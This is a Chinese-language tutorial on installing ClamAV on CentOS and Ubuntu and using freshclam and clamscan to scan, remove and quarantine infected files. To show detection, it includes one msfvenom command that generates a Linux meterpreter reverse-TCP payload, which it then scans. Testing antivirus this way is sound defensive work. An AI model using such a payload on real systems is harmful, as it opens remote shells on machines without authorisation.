Linux下的杀毒软件ClamAV安装及使用

对于杀毒软件，我们已经司空见惯。但是想在Linux中进行病毒扫描，却并非易事。今天给大家介绍如何在Linux中进行查杀病毒。

介绍

Clam AntiVirus 是一款 UNIX 下开源的 (GPL) 反病毒工具包，专为邮件网关上的电子邮件扫描而设计。该工具包提供了包含灵活且可伸缩的监控程序、命令行扫描程序以及用于自动更新数据库的高级工具在内的大量实用程序。该工具包的核心在于可用于各类场合的反病毒引擎共享库。主要使用ClamAV开源杀毒引擎检测木马、病毒、恶意软件和其他恶意的威胁

安装

CentOS

在CentOS 上安装我们只需只需下面命令即可

yum install -y epel-release
yum install -y clamav

ubuntu上安装

sudo apt install -y clamav

当然，我们还可以通过编译源码的方法进行安装。只不过上诉安装方式是最简单的方法了。

查看帮助

clamscan -h

命令比较多，但是最常用的也就是下面的几项，我们一一道来！

使用

更新病毒库

我们只需执行命令freshclam便可以完成对病毒库的更新。

扫描

参数

• -r: 指定目标
• -l: 指定日志
• -max-dir-recursion: 指定扫描深度

扫描文件

clamscan targetfile

示例

递归扫描home目录，并且记录日志

clamscan -r -i /home  -l  /var/log/clamscan.log

递归扫描home目录，将病毒文件删除，并且记录日志

clamscan -r -i /home  --remove  -l /var/log/clamscan.log

扫描指定目录，然后将感染文件移动到指定目录，并记录日志

clamscan -r -i /home  --move=/opt/infected  -l /var/log/clamscan.log

查杀效果

如，我们在msf中生成一个Linux Shell。上传服务器进行查杀！

生成一个shell

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.123.43 lport=5555 -f elf -o kali.elf

查杀

clamscan  kali.elf --remove  -l clamscan.log